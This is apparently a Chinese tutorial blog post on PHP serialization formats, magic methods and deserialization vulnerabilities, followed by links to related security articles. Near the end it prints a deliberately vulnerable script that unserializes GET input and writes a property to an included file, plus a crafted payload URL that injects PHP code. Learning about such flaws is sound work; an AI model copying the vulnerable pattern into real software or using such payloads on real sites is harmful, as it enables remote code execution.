前言

这几天一直在关注新管状病毒,从微博到各大公众号朋友圈了解感觉挺严重的看微博感觉特别严重看官方说法感觉还行那就取中间的吧 自己要会对这个东西要有理性的判断。关注了好两天所以耽搁了学习emmm 希望病毒早点过去吧!

反序列化漏洞

序列化和反序列化

为了有效地存储或传递数据,同时不丢失其类型和结构,经常需要利用序列化和反序列化函数对数据进行处理。

反序列化函数返回字符串,此字符串包含了表示值的字节流,可以存储于任何地方

反序列化函数对单一的已序列化的变量进行操作,将其转换成员来的值

这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性

PHP语言中常用的序列化和反序列化函数有serialize、unserialize、json_encode、json_decode

PHP序列化

1.serialize函数

serialize是序列化函数,PHP在序列化动作之前调用改对象的成员函数__sleep。这样就允许对象在被序列化之前做任何清除操作。’

(1)   NULL的序列化

在PHP中,NULL被序列化为N。

<?php

$str=NULL;

$xl_str=serialize($str);

print_r($xl_str);

?>

页面结果为: N;

(2)   Boolean型数据的序列化

Boolean型数据被序列化成b:<digit>。其中,<digit>表示0或1。当boolean型数据为false时,<digit>为0,否则为1

<?php

$str1=true;

$str2=false;

$xl_str1=serialize($str1);

$xl_str2=serialize($str2);

print_r($xl_str1."<br>");

print_r($xl_str2);

?>

页面结果为:

b:1;

b:0;

(3)   Integer型数据的序列化

Interger型(整型)数据被序列化为i:<number>.其中<number>为一个整型数,范围为:-2147483648——2147483647,如果被序列化的数字超过这个范围,则会被序列化为浮点型而不是整型。如果序列化后的数字超过这个范围,则反序列化时不会反悔期望的数值(PHP本身序列化时不会发生这个问题)

<?php

$str1=123;

$xl_str1=serialize($str1);

print_r($xl_str1);

?>

页面显示为:i:123;

(4)   Double型数据的序列化

Double型(浮点型)数据被序列化为d:<number>。其中<number>为一个浮点数,其范围与PHP的浮点数范围一样,可以表示成整数形式、浮点数形式和科学计数法形式。如果序列化无穷大,则<number>为INF;如果序列化负无穷大则<number>为-INF。如果序列化后的数字超过PHP能表示的最大值,则反序列化时返无穷大(INF);如果如果序列化的数据为非数字,则被序列化为NAN,NAN反序列化时返回0,其他语言可以将NAN反序列化为相应的语言所支持的NAN表示形式

<?php

$double1=1.23;

$xl_str1=serialize($double1);

print_r($xl_str1);

?>

页面显示为:d:1.23;

(5)   String型数据的序列化

String型(字符串型)数据序列化为s:<length>:”<value>”

<?php

$str1="test xiaohua";

$xl_str1=serialize($str1);

print_r($xl_str1);

?>

页面显示结果为:s:12:"test xiaohua";

(6)   数组的序列化

数组序列化通常被序列化为

a:<n>:{<key 1><value 1><key 2><value 2><key3><value 3><key 4><value 4>…}

<n>表示数组个数

<key>表示数组下标

<value>表示与下标相对应的数组元素值

<?php

$shu=array('xiaohua1','xiaohua2','xiaohua3');

$xl_str1=serialize($shu);

print_r($xl_str1);

?>

页面显示结果:a:3:{i:0;s:8:"xiaohua1";i:1;s:8:"xiaohua2";i:2;s:8:"xiaohua3";}

(7)   对象的序列化

对象通常被序列化称:

O:<length>:"<class name>":<n>:{<field name 1><field value 1><field name 2><field value 2>...<field name n><field value n>}

<length>:对象类名字符串长度

<class name>:对象的类名

<n>:对象中字段数 包括var、protected、private、public声明的字段,不包括static和const声明的静态字符串

<field name 1><field value 1>:每个字段对应的每个字段名

<?php

class xiaohua{

public $str='xiaohua';

public $str2="huahua";

function Func(){

        print("this is Func''");

}

}

$aaa=new xiaohua;

$se=serialize($aaa);

print $se;

?>

页面显示结果:

O:7:"xiaohua":2:{s:3:"str";s:7:"xiaohua";s:4:"str2";s:6:"huahua";}

s:3:"str";s:7:"xiaohua";

解读:s表示字符串类型,3是字段值长度 字段名称是str。s表示字符串7表示字段值长度 字段名称是xiaohua

PHP反序列化

反序列化

unserialize是反序列化函数

若被序列化的变量是一个对象,在重新构造对象之后,会自动调用__wakeup成员函数(如果存在)

<?php

class xiaohua{

       public $str='xiaohua';

       public $str2="huahua";

       function Func(){

              print("this is Func''");

       }

}

$aaa=new xiaohua;

$se=serialize($aaa);

$stra='O:7:"xiaohua":2:{s:3:"str";s:7:"xiaohua";s:4:"str2";s:6:"huahua";} ';

$stra=unserialize($stra);

var_dump($stra);

?>

页面显示结果:object(xiaohua)#2 (2) { ["str"]=> string(7) "xiaohua" ["str2"]=> string(6) "huahua" }

反序列化漏洞利用

反序列化漏洞利用

反序列化漏洞产生主要原因:
(1)unserialize函数的参数可控

(2)存在魔法函数

1.__construct函数和__destruct函数

void __construct([mixed $args[,$...]])

PHP5允许开发者在一个类中定义一个方法作为构造函数。具有构造函数的类会在每次创建新的对象时先调用此方法,所以__construct函数非常适合在使用对象之前做一些初始化工作。

__destruct函数

void __destruct(void)

PHP5引入了析构函数的概念,这类似于其他面向对象的语言,如C++.析构函数会在对某个对象的所有引用都被删除或者对象被显式销毁时执行

示例代码:

 1 <?php

 2 class xiaohua{

 3

 4        function __construct(){

 5

 6                      print "In construct <br>";

 7

 8                      $this->name="my xiaohua";

 9

10        }

11

12        function __destruct(){

13

14               print "Destruct<br>" .$this->name."\n";

15

16        }

17

18 }

19

20 $obj=new xiaohua();

21

22 ?>

25 执行结果:

26 In construct

27 Destruct

28 my xiaohua

创建xiaohua类的新对象时,会调用__construct函数,输出 In construct;对象被销毁时,会调用__destruct函数输出 Destruct my xiaohua

2.__sleep函数和__wakeup函数

__sleep函数

Serialize函数会坚持类中是否存在__sleep函数,如果存在函数会先被调用,然后执行序列化操作。此功能可以用于清理对象,并返回一个包含对象中所有应被序列化的变量名称数组。如果该函数未返回任何内容,则NULL被序列化,并产生一个E_NOTICE级别的错误.

  __sleep函数不能返回父类的私有成员的名字,会产生E_NOTICE错误,该函数可以用serializable接口替代。

__sleep函数常用于提交未提交的数据或进行类似的清理操作。同时,如果有一些很大的对象,但不需要全部保存,则使用此功能比较好。

__wakeup函数

Unserialize函数会检查是否存在__wakeup函数。如果存在,则会先调用__wakeup函数,预先准备对象需要的资源。

  __wakeup函数经常用在反序列化操作中,例如,重新建立数据连接或者性其他初始化操作。

 1 <?php

 2

 3 class xiaohua{

 4

 5     function huahua(){

 6

 7            $this->name="huahua";

 8

 9            print $this->name;

10

11     }

12

13     function __wakeup(){

14

15            echo "wakeup  <br>";

16

17     }

18

19     function __sleep(){

20

21            echo "<br> sleep <br>";

22

23            return array('name');

24     }

25

26 }

27

28 $sst='O:7:"xiaohua":2:{s:3:"str";s:7:"xiaohua";s:4:"str2";s:6:"huahua";} ';

29 $sst=unserialize($sst);

30 var_dump($sst);

31 $xiaohua1=new xiaohua;

32 $xiaohua1->name="bobo";

33 $sr=serialize($xiaohua1);

34 print $sr;

35

36 ?>

37 执行结果:

38 wakeup

39 object(xiaohua)#1 (2) { ["str"]=> string(7) "xiaohua" ["str2"]=> string(6) "huahua" }

40 sleep

41 O:7:"xiaohua":1:{s:4:"name";s:4:"bobo";}

反序列化后,会自动调用__wakeup函数,输出wakeup。序列化对象后,会自动调用__sleep函数输出sleep

反序列化漏洞代码分析

反序列化漏洞代码分析

 1 <?php

 2 highlight_file(__FILE__);

 3 class a{

 4        var $test='hello';

 5        function __destruct(){

 6               $fp=fopen("C:\phpStudy\PHPTutorial\WWW\hua.php","w");

 7               print "===".$this->test;

 8               fputs($fp,$this->test);

 9               fclose($fp);

10        }

11 }

12

13 $class=stripslashes($_GET['re']);

14 print $class;

15 $class_unser=unserialize($class);

16 require 'C:\phpStudy\PHPTutorial\WWW\hua.php';

17 ?>

漏洞分析:

(1)    unserialize函数的参数$class可控

(2)    存在__destruct函数,此函数会将$this->test的值写入C:\phpStudy\PHPTutorial\WWW\hua.php文件

漏洞利用

通过参数re传入的值要实例化a,并且改变$test的值。因为__destruct函数可以将$test的值写入hua.php文件中,所以可以利用该函数将PHP代码传入hello.php文件中。

 1 <?php

 2 class a{

 3        var $test='<?php phpinfo();?>';

 4 }

 5 $a=new a();

 6 $class_sere=serialize($a);

 7 print_r($class_sere)

 8 ?>

 9 执行结果:

10  O:1:"a":1:{s:4:"test";s:22:"<?php%20phpinfo();?>";}

pyload:

http://127.0.0.1/test.php?re=O:1:"a":1:{s:4:"test";s:22:"<?php%20phpinfo();?>";}

参考学习:《web安全原理分析与实践》

  https://www.freebuf.com/vuls/116705.html

[web安全原理]PHP反序列化漏洞的更多相关文章

  1. Web安全之PHP反序列化漏洞

    漏洞原理: 序列化可以将对象变成可以传输的字符串,方便数据保存传输,反序列化就是将字符串还原成对象.如果web应用没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被控制,就会造成代码执行, ...

  2. [web安全原理分析]-SSRF漏洞入门

    SSRF漏洞 SSRF漏洞 SSRF意为服务端请求伪造(Server-Side Request Forge).攻击者利用SSRF漏洞通过服务器发起伪造请求,就这样可以访问内网的数据,进行内网信息探测或 ...

  3. [web安全原理分析]-XEE漏洞入门

    前言 1 前言 XXE漏洞 XXE漏洞全称(XML External Entity Injection)即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致 ...

  4. web安全原理-文件包含漏洞

    前言 起来吃完早饭就开始刷攻防世界的题,一个简单的文件包含题我竟然都做不出来我服了  拿出买的书开始从头学习总结文件包含漏洞! 一.文件包含漏洞 文件包含漏洞 文件包含函数的参数没有经过过滤或者严格的 ...

  5. Java反序列化漏洞从入门到深入(转载)

    前言 学习本系列文章需要的Java基础: 了解Java基础语法及结构(菜鸟教程) 了解Java面向对象编程思想(快速理解请上知乎读故事,深入钻研建议买本<疯狂Java讲义>另外有一个刘意老 ...

  6. java反序列化漏洞原理研习

    零.Java反序列化漏洞 java的安全问题首屈一指的就是反序列化漏洞,可以执行命令啊,甚至直接getshell,所以趁着这个假期好好研究一下java的反序列化漏洞.另外呢,组里多位大佬对反序列化漏洞 ...

  7. 浅谈PHP反序列化漏洞原理

    序列化与反序列化 序列化用途:方便于对象在网络中的传输和存储 0x01 php反序列化漏洞 在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等. 常见的序列化格式: ...

  8. 强网杯web之假的反序列化漏洞

    说明 打强网杯的时候一直在写论文, 做林逸师傅的培训题目. 现在得空,还是看了一部分的题目和wp. 源码 源码一共三部分, 这里只写下我知识盲区的一部分,作为自己的记录. <?php highl ...

  9. [web安全原理]PHP命令执行漏洞基础

    前言 PHP命令执行漏洞 应用程序的某些功能功能需要调用可以执行系统命令的函数,如果这些函数或者函数的参数被用户控制,就有可能通过命令连接符将恶意命令拼接到正常的函数中,从而随意执行系统命令,这就是命 ...

随机推荐

  1. 多线程之Callable

    多线程实现Callable的好处有三点 1.Callable支持泛型 2.Callable支持返回值 3.Callable可以抛出异常 class MyThread2 implements Calla ...

  2. instanceof语法解释

    syso+alt+/  快速输出语句的按键.   1.  instanceof java的一个二元操作,和==,>,<,同一类的用法,作用是判断  左边的对象是否是右边的类的实例 ,左边是 ...

  3. 如何分析、排查、解决Redis变慢问题?

    关于如何分析.排查.解决Redis变慢问题,根据实践总结了一些清单如下: 1.使用复杂度过高的命令(例如SORT/SUION/ZUNIONSTORE/KEYS),或一次查询全量数据(例如LRANGE ...

  4. 03 . Go框架之Gin框架从入门到熟悉(Cookie和Session,数据库操作)

    Cookie Cookie是什么 HTTP是无状态协议,服务器不能记录浏览器的访问状态,也就是说服务器不能区分两次请求是否由同一个客户端发出 Cookie就是解决HTTP协议无状态的方案之一,中文是小 ...

  5. 运行Apache时出现the requested operation has failed

    在修改自己主机E:\wamp\apache\conf中的httpd.conf中的站点位置后,重新运行Apache时,出现对话框提示"the requested operation has f ...

  6. Windows 端口被占用,但进程号对应的进程不存在,使用Get-Process来查找进程挺方便的

    Windows上很少安装数据库,这次遇到一个小问题:数据库启动之后提示: 警告: 无法为 "*" 创建监听套接字 致命错误: 无法创建TCP/IP套接字 日志: 数据库系统已关闭 ...

  7. Git的介绍及使用

    一.配置用户信息: 配置用户名和邮箱: $ git config --global user.name "chunyu" $ git config --global user.em ...

  8. .net 实现签名验签

    本人被要求实现.net的签名验签,还是个.net菜鸡,来分享下采坑过程 依然,签名验签使用的证书格式依然是pem,有关使用openssl将.p12和der转pem的命令请转到php实现签名验签 .ne ...

  9. 6.1 接口 - 6.3 lambda表达式

    6.1 接口 接口概念 接口是对类的一组需求描述,这些类要遵从接口描述的统一格式进行定义.设计目的是解决多继承的问题 接口中所有方法时 public 不用现实声明 java.lang.Comparab ...

  10. python实现年会抽奖程序

    用python来实现一个抽奖程序,供大家参考,具体内容如下 主要功能有 1.从一个csv文件中读入所有员工工号2.将这些工号初始到一个列表中3.用random模块下的choice函数来随机选择列表中的 ...